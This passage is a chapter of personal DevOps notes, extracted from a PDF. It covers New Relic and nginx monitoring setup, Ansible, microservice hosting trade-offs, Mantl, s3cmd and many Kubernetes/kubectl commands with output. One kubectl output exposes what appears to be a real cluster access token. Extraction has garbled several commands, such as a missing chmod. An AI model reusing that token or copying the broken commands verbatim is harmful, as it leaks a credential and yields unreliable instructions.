$ pip install newrelic $ newrelic-admin generate-config newrelic.ini $ NEW_RELIC_CONFIG_FILE=newrelic.ini newrelic-admin run-program gunicorn -b0.0.0.0:8000 -w ${GUNICORN_WORKERS:-3} pomegranate.wsgi:application

Install New Relic server on Debian/ubuntu

$ echo deb http://apt.newrelic.com/debian/ newrelic non-free >> /etc/apt/sources.list.

˓→d/newrelic.list $ wget -O- https://download.newrelic.com/548C16BF.gpg | apt-key add - $ apt-get update $ apt-get install newrelic-sysmond $ nrsysmond-config --set license_key= $ /etc/init.d/newrelic-sysmond start # To uninstall $ apt-get remove newrelic-sysmond

70 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://docs.newrelic.com/docs/servers/new-relic-servers-linux/installation-configuration/ servers-installation-ubuntu-debian Enabling New Relic Servers for Docker

$ groupadd -r docker $ usermod -a -G docker newrelic https://docs.newrelic.com/docs/servers/new-relic-servers-linux/installation-configuration/ enabling-new-relic-servers-docker https://docs.newrelic.com/docs/servers/new-relic-servers-linux/getting-started/new-relic-servers-docker

14.6.2 What is bam.nr-data.net

This is for RUM injections for our Browser monitoring product. http://newrelic.com/browser-monitoring https://discuss.newrelic.com/t/what-is-bam-nr-data-net/13848/2 https://docs.newrelic.com/docs/browser/new-relic-browser/page-load-timing-resources/page-load-timing-process https://docs.newrelic.com/docs/new-relic-browser/instrumentation-for-page-load-timing https://docs.newrelic.com/docs/browser/new-relic-browser/performance-quality/security-new-relic-browser

14.6.3 How to install Nginx New Relic plugin http://nginx.org/en/linux_packages.html http://newrelic.com/plugins/nginx-inc/13 http://haydenjames.io/using-new-relic-monitor-nginx-heres/ https://www.scalescale.com/tips/nginx/nginx-new-relic-plugin/

$ wget http://nginx.org/keys/nginx_signing.key $ sudo apt-key add nginx_signing.key $ sudo vim /etc/apt/sources.list # Debian deb http://nginx.org/packages/debian/ jessie nginx deb-src http://nginx.org/packages/debian/ jessie nginx # Ubuntu deb http://nginx.org/packages/ubuntu/ trusty nginx deb-src http://nginx.org/packages/ubuntu/ trusty nginx

$ sudo apt-get update $ sudo apt-get install nginx-nr-agent

Output:

Thanks for using NGINX!

NGINX agent for New Relic is installed. Configuration file is: /etc/nginx-nr-agent/nginx-nr-agent.ini

Documentation and configuration examples are available here: (continues on next page)

14.6. Monitoring Tools 71 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) /usr/share/doc/nginx-nr-agent/README.txt

Please use "service nginx-nr-agent" to control the agent daemon.

More information about NGINX products is available on: * https://www.nginx.com/

$ sudo vim /etc/nginx-nr-agent/nginx-nr-agent.ini # update LICENCE KEY and [source] section

$ sudo vim nginx.conf

# Server status location= /status{ stub_status on; allow 127.0.0.1; allow 172.17.0.0/16; deny all; }

Testing the New Relic Nginx plugin The best way to check if this is working is to tail the logs:

$ tail -f /var/log/nginx-nr-agent.log

14.6.4 Real-time web log analyzer and interactive viewer

$ goaccess -f nginx.log

$ goaccess -f nginx.log --log-format="%h %^[%d:%^] \"%r\" %s %b \"%R\" \"%u\"" --date-

˓→format="%d/%b/%Y" --time-format="%T" -a > report.html https://github.com/allinurl/goaccess

14.7 Ansible

Ansible’s unique feature set Based on an agent-less architecture (unlike Chef or Puppet). Accessed mostly through SSH (it also has local and paramiko modes). No custom security infrastructure is required. Configurations (playbooks, modules etc.) written in the easy-to-use YML format. Shipped with more than 250 built-in modules. Full configuration management, orchestration, and deployment capability. Ansible interacts with its clients either through playbooks or a command-line tool. http://cloudacademy.com/blog/ansible-aws/ http://docs.ansible.com/ansible/guide_aws.html http://docs.ansible.com/ansible/ec2_module.html https://aws.amazon.com/blogs/apn/getting-started-with-ansible-and-dynamic-amazon-ec2-inventory-management/

72 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.7.1 Install

$ sudo pip install ansible

$ sudo apt-add-repository -y ppa:ansible/ansible $ sudo apt-get update $ sudo apt-get install -y ansible

14.8 Microservices

14.8.1 Multiple Services Per Host

Benefits: First, purely from a host management point of view, it is simpler. In a world where one team manages the infrastructure and another team manages the software, the infrastructure team’s workload is often a function of the number of hosts it has to manage. If more services are packed on to a single host, the host management workload doesn’t increase as the number of services increases. Second is cost. Even if you have access to a virtualization platform that allows you to provision and resize virtual hosts, the virtualization can add an overhead that reduces the underlying resources available to your services. In my opinion, both these problems can be addressed with new working practices and technology, and we’ll explore that shortly. This model is also familiar to those who deploy into some form of an application container. In some ways, the use of an application container is a special case of the multiple-services-per-host model. This model can also simplify the life of the developer. Deploying multiple services to a single host in production is synonymous with deploying multiple services to a local dev workstation or laptop. If we want to look at an alternative model, we want to find a way to keep this conceptually simple for developers. Challenges: First, it can make monitoring more difficult. For example, when tracking CPU, do I need to track the CPU of one service independent of the others? Or do I care about the CPU of the box as a whole? Side effects also be hard to avoid. If one service is under significant load, it can end up reducing the resources available to other parts of the system. Gilt, when scaling out the number of services it ran, hit this problem. Initially it coexisted many services on a single box, but uneven load on one of the services would have an adverse impact on everything else running on that host. This makes impact analysis of host failures more complex as well — taking a single host out of commission can have a large ripple effect. Deployment of services can be somewhat more complex too, as ensuring one deployment doesn’t affect another leads to additional headaches. For example, if I use Puppet to prepare a host, but each service has different (and potentially contradictory) dependencies, how can I make that work? In the worst-case scenario, I have seen people tie multiple service deployments together, deploying multiple different services to a single host in one step, to try to simplify the deployment of multiple services to one host. In my opinion, the small upside in improving simplicity is more than outweighed by the fact that we have given up one of the key benefits of microservices: striving for independent release of our software. If you do adopt the multiple- services-per-host model, make sure you keep hold of the idea that each service should be deployed independently.

14.8. Microservices 73 Omid Raha MyStack Documentation, Release 0.1

This model can also inhibit autonomy of teams. If services for different teams are installed on the same host, who gets to configure the host for their services? In all likelihood, this ends up getting handled by a centralized team, meaning it takes more coordination to get services deployed. Another issue is that this option can limit our deployment artifact options. Image-based deployments are out, as are immutable servers unless you tie multiple different services together in a single artifact, which we really want to avoid. The fact that we have multiple services on a single host means that efforts to target scaling to the service most in need of it can be complicated. Likewise, if one microservice handles data and operations that are especially sensitive, we might want to set up the underlying host differently, or perhaps even place the host itself in a separate network segment. Having everything on one host means we might end up having to treat all services the same way even if their needs are different.

14.8.2 Single Service Per Host

With a single-service-per-host model, we avoid side effects of multiple hosts living on a single host, making monitoring and remediation much simpler. We have potentially reduced our single points of failure. An outage to one host should impact only a single service, although that isn’t always clear when you’re using a virtualized platform. We also can more easily scale one service independent from others, and deal with security concerns more easily by focusing our attention only on the service and host that requires it. Having an increased number of hosts has potential downsides, though. We have more servers to manage, and there might also be a cost implication of running more distinct hosts. Despite these problems, this is still the model I prefer for microservice architectures.

14.8.3 Mantl

From my understanding, Mantl is a collection of tools/applications that ties together to create a cohesive docker-based application platform. Mantl is ideally deployed on virtualized/cloud environments (AWS, OpenStack, GCE), but I have just recently able to deploy it on bare-. The main component in Mantl is Mesos, which manages dockers, handles scheduling and task isolation. Marathon is a mesos framework that manages long running tasks, such as web services, this is where most application reside. The combination of mesos-marathon handles application high- availability, resiliency and load-balancing. Tying everything together is consul, which handles service discovery. I use consul to do lookups for each application to communication to each other. Mantl also includes the ELK stack for logging, but I haven’t had any success in monitoring any of my applications, yet. There is also Chronos, where scheduled tasks are handles ala cron. Traefik acts as a reverse-proxy, where application/service endpoints are mapped to URLs for external services to communicate. Basically, your microservices should be self-contained in docker images, initiate communications via consul lookup and logs into standard io. Then you deploy your app, using the Marathon API, and monitor it in Marathon UI. When deploying your dockerized-app, marathon will register you docker image names in consul, along with its’ exposed port. Scheduled tasks should be deployed in Chronos, where you will be able to monitor running tasks and pending scheduled tasks. http://stackoverflow.com/questions/35267071/how-microservices-are-managed-using-mantl http://www.infoq.com/news/2016/02/cisco-mantl-microservices https://sreeninet.wordpress.com/2016/03/25/microservices-infrastructure-using-mantl/ https://fak3r.com/2015/05/27/howto-build-microservices-infrastructure-with-mantl/

$ git clone https://github.com/CiscoCloud/mantl.git $ cd mantl $ pip install -r requirements.txt $ ./security-setup $ vagrant up $ vagrant status

74 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

Now browse to https://192.168.100.101 To create new container:

$ curl -k -X POST -H "Content-Type: application/json" -u "admin:1" -d@"examples/hello-

˓→world/hello-world.json" "https://192.168.100.101/marathon/v2/apps"

Mantl uses Mesos as the Orchestration layer.

14.8.4 lattice http://lattice.cf/docs/getting-started/

14.8.5 vamp http://vamp.io/

14.8.6 calico https://www.projectcalico.org/getting-started/docker/ https://github.com/projectcalico/calico

14.8.7 marathon https://github.com/mesosphere/marathon

14.8.8 terraform https://www.terraform.io/intro/

14.9 Simple Storage Service (S3)

14.9.1 S3cmd configuration to use with Swift storage object

$ vim ~/.s3cfg bucket_location= host_base= 102fb212.example-storage.com host_bucket= 102fb212.example-storage.com access_key= 1111111111 secret_key= 2222222222 signature_v2= True cloudfront_host= simpledb_host= website_endpoint= website_error= website_index= https://docs.minio.io/docs/s3cmd-with-minio

14.9. Simple Storage Service (S3) 75 Omid Raha MyStack Documentation, Release 0.1

14.9.2 Sync remote s3 objects to the local file system

$ s3cmd sync s3://files/ ~/ws/backup/files/

14.10 VPS services

14.10.1 VPS with more Storage https://www.bitaccel.com/#storage https://backupsy.com/ https://buyvm.net/storage-vps/

14.10.2 Cheap VPS https://vpsdime.com https://openvz.io/

14.11 kubernetes

Kubernetes is a container orchestration tool that builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community. Although Kubernetes is a feature-rich project, a few key features caught our attention: namespaces, (http:// kubernetes.io/docs/user-guide/namespaces/) automated rollouts and rollbacks, (http://kubernetes.io/docs/user-guide/ deployments/) service discovery via DNS, (http://kubernetes.io/docs/user-guide/services/) automated container scal- ing based on resource usage, (http://kubernetes.io/docs/user-guide/horizontal-pod-autoscaling/) and of course, the promise of a self-healing system. (http://kubernetes.io/docs/user-guide/pod-states/#container-probes) http://danielfm.me/posts/five-months-of-kubernetes.html

76 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.11. kubernetes 77 Omid Raha MyStack Documentation, Release 0.1

14.11.1 Monitoring https://kubernetes.io/docs/concepts/cluster-administration/resource-usage-monitoring/ https://github.com/kubernetes/heapster https://github.com/google/cadvisor

14.11.2 Running Kubernetes Locally via Minikube https://github.com/kubernetes/minikube/releases

Installation

$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/v0.18.0/minikube-

˓→linux-amd64&& +x minikube&& sudo mv minikube /usr/local/bin/

$ minikube get-k8s-versions $ minikube start $ minikube start --docker-env HTTP_PROXY="http://127.0.0.1:7070" --docker-env HTTPS_

˓→PROXY="http://127.0.0.1:7070" (continues on next page)

78 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ minikube docker-env $ eval $(minikube docker-env) $ docker ps $ minikube addons list $ minikube dashboard $ kubectl run hello-minikube --image=gcr.io/google_containers/echoserver:1.4 --

˓→port=8080 $ minikube ssh cat /var/lib/boot2docker/profile $ minikube stop $ minikube delete https://kubernetes.io/docs/getting-started-guides/minikube/#installation https://github.com/petervandenabeele/hello-kubernetes

Minikube behind a proxy

$ minikube start --docker-env="http_proxy=http://192.168.10.119:7070" --docker-env=

˓→"https_proxy=http://192.168.10.119:7070" start

$ kubectl cluster-info # Listing the nodes in the cluster $ kubectl get nodes # List cluster events $ kubectl get events # List services that are running in the cluster $ kubectl get services $ kubectl get pods $ kubectl get pods --namespace=kube-system

To start with, we will only see one service, named kubernetes . This service is the core API server, monitoring and logging services for the pods and cluster. Even though we have not deployed any applications on Kubernetes yet, we note that there are several containers already running. The following is a brief description of each container: • fluentd-gcp (fluentd-elasticsearch by Elasticsearch and Kibana) This container collects and sends the clus- ter logs file to the Google Cloud Logging service. • kube-ui This is the UI that we saw earlier. • kube-controller-manager The controller manager controls a variety of cluster functions. Ensuring accurate and up-to-date replication is one of its vital roles. Additionally, it monitors, manages, and discovers new nodes. Finally, it manages and updates service endpoints. • kube-apiserver This container runs the API server. As we explored in the Swagger interface, this RESTful API allows us to create, query, update, and remove various components of our Kubernetes cluster. • kube-scheduler The scheduler takes unscheduled pods and binds them to nodes • etcd This runs the etcd software built by CoreOS. etcd is a distributed and consistent key-value store. This is where the Kubernetes cluster state is stored, updated, and retrieved by various components of K8s. • pause The Pause container is often referred to as the pod infrastructure container and is used to set up and hold the networking namespace and resource limits for each pod. • kube-dns provides the DNS and service discovery plumbing. • monitoring-heapster This is the system used to monitor resource usage across the cluster.

14.11. kubernetes 79 Omid Raha MyStack Documentation, Release 0.1

• monitoring-influx-grafana provides the database and we saw earlier for monitoring the infras- tructure. • skydns This uses DNS to provide a distributed service discovery utility that works with etcd • kube2Sky This is the connector between skydns and kubernetes . Services in the API are monitored for changes and updated in skydns appropriately. • heapster This does resource usage and monitoring. • exechealthz This performs health checks on the pods.

The environment variable

KUBERNETES_PROVIDER

$ kube-down $ kube-up

basic scheduling service discovery health checking pods services replication controllers labels Node (formerly min- ions, Note that in v1.0, minion was renamed to node,) The pods include services for DNS, logging, and pod health checks.

Pods

Pods essentially allow you to logically group containers and pieces of our application stacks together. While pods may run one or more containers inside, the pod itself may be one of many that is running on a Kubernetes (minion) node. As we’ll see, pods give us a logical group of containers that we can then replicate, schedule, and balance service endpoints across. nodejs-pod.yaml

apiVersion: v1 kind: Pod metadata: name: node-js-pod spec: containers: - name: node-js-pod image: bitnami/apache:latest ports: - containerPort: 80

$ kubectl create -f nodejs-pod.yaml $ kubectl describe pods/node-js-pod

$ kubectl exec node-js-pod--curl

By default, this runs a command in the first container it finds, but you can select a specific one using the -c argument.

Labels

Labels are just simple key-value pairs. You will see them on pods, replication controllers, services, and so on. The label acts as a selector and tells Kubernetes which resources to work with for a variety of operations. Think of it as a filtering option.

80 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

Services

Services and replication controllers give us the ability to keep our applications running with little interruption and graceful recovery. Services allow us to abstract access away from the consumers of our applications. Using a reliable endpoint, users and other programs can access pods running on your cluster seamlessly. K8s achieves this by making sure that every node in the cluster runs a proxy named kube- proxy. As the name suggests, kube-proxy’s job is to proxy communication from a service endpoint back to the corresponding pod that is running the actual application.

Replication controllers (RCs)

As the name suggests, manage the number of nodes that a pod and included container images run on. They ensure that an instance of an image is being run with the specific number of copies. RCs create a high-level mechanism to make sure that things are operating correctly across the entire application and cluster. RCs are simply charged with ensuring that you have the desired scale for your application. You define the number of pod replicas you want running and give it a template for how to create new pods. Just like services, we will use selectors and labels to define a pod’s membership in a replication controller. Kubernetes doesn’t require the strict behavior of the replication controller. In fact, version 1.1 has a job controller in beta that can be used for short lived workloads which allow jobs to be run to a completion state nodejs-controller.yaml apiVersion: v1 kind: ReplicationController metadata: name: node-js labels: name: node-js deployment: demo spec: replicas:3 selector: name: node-js deployment: demo template: metadata: labels: name: node-js spec: containers: - name: node-js image: jonbaier/node-express-info:latest ports: - containerPort: 80

• Kind tells K8s what type of resource we are creating. In this case, the type is ReplicationController . The kubectl script uses a single create command for all types of resources. The benefit here is that you can easily create a number of resources of various types without needing to specify individual parameters for each type. However, it requires that the definition files can identify what it is they are specifying. • ApiVersion simply tells Kubernetes which version of the schema we are using. All examples in this book will be on v1 .

14.11. kubernetes 81 Omid Raha MyStack Documentation, Release 0.1

• Metadata is where we will give the resource a name and also specify labels that willbe used to search and select resources for a given operation. The metadata element also allows you to create annotations, which are for nonidentifying information that might be useful for client tools and libraries. • spec which will vary based on the kind or type of resource we are creating. In this case, it’s ReplicationCon- troller , which ensures the desired number of pods are running. The replicas element defines the desired number of pods, the selector tells the controller which pods to watch, and finally, the template element defines a template to launch a new pod. The template section contains the same pieces we saw in our pod definition earlier. An important thing to note is that the selector values need to match the labels values specified in the pod template. Remember that this matching is used to select the pods being managed.

$ kubectl create -f nodejs-controller.yaml $ kubectl create -f nodejs-rc-service.yaml

A Kubernetes cluster is formed out of 2 types of resources: Master is coordinating the cluster Nodes are where we run applications https://kubernetesbootcamp.github.io/kubernetes-bootcamp/index.html # docker run –net=host -d gcr.io/google_containers/etcd:2.0.9 /usr/local/bin/etcd –addr=127.0.0.1:4001 –bind- addr=0.0.0.0:4001 –data-dir=/var/etcd/data # docker run –net=host -d -v /var/run/docker.sock:/var/run/docker.sock gcr.io/google_containers/hyperkube:v0.21.2 /hyperkube kubelet –api_servers=http://localhost:8080 –v=2 –ad- dress=0.0.0.0 –enable_server –hostname_override=127.0.0.1 –config=/etc/kubernetes/manifests # docker run -d –net=host –privileged gcr.io/google_containers/hyperkube:v0.21.2 /hyperkube proxy –master=http://127.0.0.1:8080 –v=2

Install manually

$ git clone --depth1 https://github.com/kubernetes/kubernetes.git $ export KUBERNETES_PROVIDER=vagrant $ export KUBE_VERSION=1.2.0 $ export FLANNEL_VERSION=0.5.0 $ export ETCD_VERSION=2.2.0 $ export K8S_VERSION=$(curl -sS https://storage.googleapis.com/kubernetes-release/

˓→release/stable.txt) $ export K8S_VERSION=$(curl -sS https://storage.googleapis.com/kubernetes-release/

˓→release/latest.txt)

14.11.3 Guestbook Example https://github.com/kubernetes/kubernetes/tree/master/examples/guestbook

14.11.4 Service Discovery

There are two ways Kubernetes can implement service discovery: through environment variables and through DNS.

14.11.5 Install kubectl binary via curl

82 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https:/

˓→/storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/

˓→kubectl # To download a specific version $ curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.13.1/bin/

˓→linux/amd64/kubectl $ chmod +x ./kubectl $ sudo mv ./kubectl /usr/local/bin/kubectl https://kubernetes.io/docs/tasks/kubectl/install/

14.11.6 Interactive K8S starting guide

$ kubectl cluster-info # Shows all nodes that can be used to host our applications on the nodes in the

˓→cluster $ kubectl get nodes # Show both the client and the server versions $ kubectl version # Deploy our app $ kubectl run kubernetes-bootcamp --image=docker.io/jocatalin/kubernetes-bootcamp:v1 -

˓→-port=80 deployment "kubernetes-bootcamp" created # List our deployments $ kubectl get deployments NAME DESIRED CURRENT UP-TO-DATE AVAILABLE AGE kubernetes-bootcamp1111 4m $ kubectl proxy Starting to serve on 127.0.0.1:8001 $ export POD_NAME=$(kubectl get pods -o go-template --template '{{range .items}}{{.

˓→metadata.name}}{{"\n"}}{{end}}') $ echo Name of the Pod: $POD_NAME $ kubectl get pods NAME READY STATUS RESTARTS AGE kubernetes-bootcamp-390780338-rpcw81/1 Running0 12m https://kubernetes.io/docs/tutorials/ https://kubernetes.io/docs/tutorials/kubernetes-basics/ https://kubernetes.io/docs/tutorials/kubernetes-basics/explore-intro/ Pods are the atomic unit on the Kubernetes platform. When we create a Deployment on Kubernetes, that Deployment creates Pods with containers inside them (as opposed to creating containers directly). Each Pod is tied to the Node where it is scheduled, and remains there until termination (according to restart policy) or deletion. In case of a Node failure, identical Pods are scheduled on other available Nodes in the cluster.

A Pod always runs on a Node. A Node is a worker machine in Kubernetes and may be either a virtual or a physical machine, depending on the cluster. Each Node is managed by the Master. A Node can have multiple pods, and the Kubernetes master automatically handles scheduling the pods across the Nodes in the cluster. The Master’s automatic scheduling takes into account the available resources on each Node

14.11. kubernetes 83 Omid Raha MyStack Documentation, Release 0.1

# To view what containers are inside that Pod and what images are used to build those

˓→containers $ kubectl describe pods # Anything that the application would normally send to STDOUT becomes logs for the

˓→container within the Pod. $ kubectl logs $POD_NAME # We can execute commands directly on the container once the Pod is up and running. $ kubectl exec $POD_NAME # Start a bash session in the Pod’s container $ kubectl exec -ti $POD_NAME bash

A Service routes traffic across a set of Pods. Services are the abstraction that allow pods to die and replicate in Kubernetes without impacting your application. Discovery and routing among dependent Pods (such as the frontend and backend components in an application) is handled by Kubernetes Services.

A Service routes traffic across a set of Pods. Services are the abstraction that allow pods to die and replicate in Kubernetes without impacting your application. Discovery and routing among dependent Pods (such as the frontend and backend components in an application) is handled by Kubernetes Services. Services match a set of Pods using labels and selectors, a grouping primitive that allows logical operation on objects in Kubernetes. Labels are key/value pairs attached to objects and can be used in any number of ways: Designate objects for development, test, and production Embed version tags Classify an object using tags

# List the current Services from our cluster $ kubectl get services $ kubectl expose deployment/kubernetes-bootcamp --type="NodePort" --port 8080 $ kubectl get services $ kubectl describe services/kubernetes-bootcamp

14.11.7 Tutorials https://www.digitalocean.com/community/tutorials/modernizing-applications-for-kubernetes

14.11.8 Working with kubectl

$ kubectl version " Client Version: version.Info{Major:"1", Minor:"13", GitVersion:"v1.13.1",

˓→GitCommit:"eec55b9ba98609a46fee712359c7b5b365bdd920", GitTreeState:"clean",

˓→BuildDate:"2018-12-13T10:39:04Z", GoVersion:"go1.11.2", Compiler:"gc", Platform:

˓→"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.6",

˓→GitCommit:"b1d75deca493a24a2f87eb1efde1a569e52fc8d9", GitTreeState:"clean",

˓→BuildDate:"2018-12-16T04:30:10Z", GoVersion:"go1.10.3", Compiler:"gc", Platform:

˓→"linux/amd64"} "

(continues on next page)

84 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ kubectl cluster-info " Kubernetes master is running at https://192.168.0.190/k8s/clusters/c-bmbj9 KubeDNS is running at https://192.168.0.190/k8s/clusters/c-bmbj9/api/v1/

˓→namespaces/kube-system/services/kube-dns:dns/proxy

To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'. " $ kubectl config view " apiVersion: v1 clusters: - cluster: certificate-authority-data: DATA+OMITTED server: https://192.168.0.190/k8s/clusters/c-bmbj9 name: sample-cluster contexts: - : cluster: sample-cluster user: user-c8kmt name: sample-cluster current-context: sample-cluster kind: Config preferences: {} users: - name: user-c8kmt user: token: kubeconfig-user-

˓→c8kmt:7nlsm6vxwrtp9bl79whg42sp7k5vrtc86qskqg9ksvm6xb5dbc558n "

$ kubectl get nodes " NAME STATUS ROLES AGE VERSION ubuntu-190 Ready controlplane,etcd 27m v1.11.6 ubuntu-191 Ready worker 12m v1.11.6 "

$ kubectl top node " NAME CPU(cores) CPU% MEMORY(bytes) MEMORY% ubuntu-190 107m 5% 1943Mi 50% ubuntu-191 40m 2% 786Mi 20% "

$ kubectl get events " LAST SEEN FIRST SEEN COUNT NAME KIND SUBOBJECT TYPE REASON

˓→ SOURCE MESSAGE ... "

$ kubectl get namespaces " NAME STATUS AGE cattle-system Active 5d (continues on next page)

14.11. kubernetes 85 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) default Active 5d ingress-nginx Active 5d kube-public Active 5d kube-system Active 5d "

$ kubectl create namespace sample-ns

" namespace/sample-ns created "

$ kubectl config get-contexts " CURRENT NAME CLUSTER AUTHINFO NAMESPACE * sample-cluster sample-cluster user-c8kmt "

$ kubectl config current-context " sample-cluster "

$ kubectl config set-context sample-cluster --namespace=sample-ns " Context "sample-cluster" modified. "

$ kubectl config get-contexts " CURRENT NAME CLUSTER AUTHINFO NAMESPACE * sample-cluster sample-cluster user-c8kmt sample-ns "

$ kubectl run example-app --image=nginx:latest --port=80 " kubectl run --generator=deployment/apps.v1 is DEPRECATED and will be removed in a

˓→future version. Use kubectl run --generator=run-pod/v1 or kubectl create instead. deployment.apps/example-app created "

$ kubectl expose deployment example-app --type=NodePort " service/example-app exposed "

$ kubectl run sample-app --image=nginx:latest " kubectl run --generator=deployment/apps.v1 is DEPRECATED and will be removed in a

˓→future version. Use kubectl run --generator=run-pod/v1 or kubectl create instead. deployment.apps/example-app created "

$ kubectl expose deployment sample-app --type=NodePort --port=80 --name=sample-

˓→service " (continues on next page)

86 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) service/sample-service exposed "

$ kubectl get services --all-namespaces " NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP

˓→PORT(S) AGE default kubernetes ClusterIP 10.43.0.1

˓→443/TCP 1h ingress-nginx default-http-backend ClusterIP 10.43.233.93

˓→80/TCP 5d kube-system kube-dns ClusterIP 10.43.0.10

˓→53/UDP,53/TCP 5d kube-system metrics-server ClusterIP 10.43.126.84

˓→443/TCP 5d sample-ns example-app NodePort 10.43.146.159

˓→80:31525/TCP 16m sample-ns sample-service NodePort 10.43.144.129

˓→80:30033/TCP 5m "

$ kubectl describe services " Name: example-app Namespace: default Labels: run=example-app Annotations: field.cattle.io/publicEndpoints: [{"addresses":["192.168.0.191"],"port":32093,"protocol

˓→":"TCP","serviceName":"default:example-app","allNodes":true}] Selector: run=example-app Type: NodePort IP: 10.43.6.186 Port: 80/TCP TargetPort: 80/TCP NodePort: 32093/TCP Endpoints: 10.42.1.41:80 Session Affinity: None External Traffic Policy: Cluster Events:

Name: sample-service Namespace: default Labels: run=sample-app Annotations: field.cattle.io/publicEndpoints: [{"addresses":["192.168.0.191"],"port":32134,"protocol

˓→":"TCP","serviceName":"default:sample-service","allNodes":true}] Selector: run=sample-app Type: NodePort IP: 10.43.167.187 Port: 80/TCP TargetPort: 80/TCP NodePort: 32134/TCP Endpoints: 10.42.1.42:80 Session Affinity: None External Traffic Policy: Cluster Events:

(continues on next page)

14.11. kubernetes 87 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) " $ kubectl get pods " NAME READY STATUS RESTARTS AGE example-app-75967bd4d-b4v7g 1/1 Running 0 16m sample-app-7d77dc8bbc-xhrjh 1/1 Running 0 6m "

$ kubectl get pods --show-labels " NAME READY STATUS RESTARTS AGE LABELS example-app-75967bd4d-ph256 1/1 Running 0 8m pod-template-

˓→hash=315236808,run=sample-app sample-app-7d77dc8bbc-2h77g 1/1 Running 0 20m pod-template-

˓→hash=3833874667,run=sample-app "

$ kubectl get pods --namespace=kube-system " NAME READY STATUS RESTARTS AGE canal-f9zgh 3/3 Running 0 45m canal-q2955 3/3 Running 0 31m kube-dns-7588d5b5f5-drhqd 3/3 Running 0 45m kube-dns-autoscaler-5db9bbb766-5jn5b 1/1 Running 0 45m metrics-server-97bc649d5-qbkdf 1/1 Running 0 45m rke-ingress-controller-deploy-job-pf6ks 0/1 Completed 0 45m rke-kubedns-addon-deploy-job-lgmxs 0/1 Completed 0 45m rke-metrics-addon-deploy-job-5swcc 0/1 Completed 0 45m rke-network-plugin-deploy-job-sbzbs 0/1 Completed 0 45m "

$ kubectl get pods --all-namespaces " NAMESPACE NAME READY STATUS

˓→RESTARTS AGE cattle-system cattle-cluster-agent-57458fc9b9-lvzsx 1/1 Running 1

˓→ 5d cattle-system cattle-node-agent-8tqv2 1/1 Running 0

˓→ 5d cattle-system cattle-node-agent-fd2wh 1/1 Running 0

˓→ 5d ingress-nginx default-http-backend-797c5bc547-q2w62 1/1 Running 0

˓→ 5d ingress-nginx nginx-ingress-controller-7szwb 1/1 Running 0

˓→ 5d kube-system canal-f9zgh 3/3 Running 0

˓→ 5d kube-system canal-q2955 3/3 Running 0

˓→ 5d kube-system kube-dns-7588d5b5f5-drhqd 3/3 Running 0

˓→ 5d kube-system kube-dns-autoscaler-5db9bbb766-5jn5b 1/1 Running 0

˓→ 5d kube-system metrics-server-97bc649d5-qbkdf 1/1 Running 0

˓→ 5d kube-system rke-ingress-controller-deploy-job-pf6ks 0/1 Completed 0

˓→ 5d (continues on next page)

88 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) kube-system rke-kubedns-addon-deploy-job-lgmxs 0/1 Completed 0

˓→ 5d kube-system rke-metrics-addon-deploy-job-5swcc 0/1 Completed 0

˓→ 5d kube-system rke-network-plugin-deploy-job-sbzbs 0/1 Completed 0

˓→ 5d sample-ns example-app-75967bd4d-clmfb 1/1 Running 0

˓→ 42m sample-ns sample-app-7d77dc8bbc-wkdxt 1/1 Running 0

˓→ 30m "

$ kubectl get deployments " NAME DESIRED CURRENT UP-TO-DATE AVAILABLE AGE example-app 1 1 1 1 16m sample-app 1 1 1 1 6m "

$ kubectl get deployments --all-namespaces " NAMESPACE NAME DESIRED CURRENT UP-TO-DATE AVAILABLE

˓→ AGE cattle-system cattle-cluster-agent 1 1 1 1

˓→ 5d ingress-nginx default-http-backend 1 1 1 1

˓→ 5d kube-system kube-dns 1 1 1 1

˓→ 5d kube-system kube-dns-autoscaler 1 1 1 1

˓→ 5d kube-system metrics-server 1 1 1 1

˓→ 5d sample-ns example-app 1 1 1 1

˓→ 43m sample-ns sample-app 1 1 1 1

˓→ 31m "

$ kubectl delete deployments --all " deployment.extensions "example-app" deleted deployment.extensions "sample-app" deleted "

$ kubectl delete services --all " service "example-app" deleted service "sample-service" deleted " https://kubernetes.io/docs/reference/kubectl/cheatsheet/ https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/ https://kubernetes.io/docs/tasks/access-application-cluster/service-access-application-cluster/ https://kubernetes.io/docs/tasks/administer-cluster/namespaces-walkthrough/#understand-the-default-namespace

14.11. kubernetes 89 Omid Raha MyStack Documentation, Release 0.1

14.11.9 Difference between targetPort and port in kubernetes Service definition

Port: Port is the port number which makes a service visible to other services running within the same K8s cluster. In other words, in case a service wants to invoke another service running within the same Kubernetes cluster, it will be able to do so using port specified against “port” in the service spec file. port is the port your service listens on inside the cluster. Target Port: Target port is the port on the POD where the service is running. Taget Port is also by default the same value as port if not specified otherwise. Nodeport: Node port is the port on which the service can be accessed from external users using Kube-Proxy. nodePort is the port that a client outside of the cluster will “see”. nodePort is opened on every node in your cluster via kube- proxy. With iptables magic Kubernetes (k8s) then routes traffic from that port to a matching service pod (even if that pod is running on a completely different node). nodePort is unique, so two different services cannot have the same nodePort assigned. Once declared, the k8s master reserves that nodePort for that service. nodePort is then opened on EVERY node (master and worker), also the nodes that do not run a pod of that service k8s iptables magic takes care of the routing. That way you can make your service request from outside your k8s cluster to any node on nodePort without worrying whether a pod is scheduled there or not. apiVersion: v1 kind: Service metadata: name: test-service spec: ports: - port: 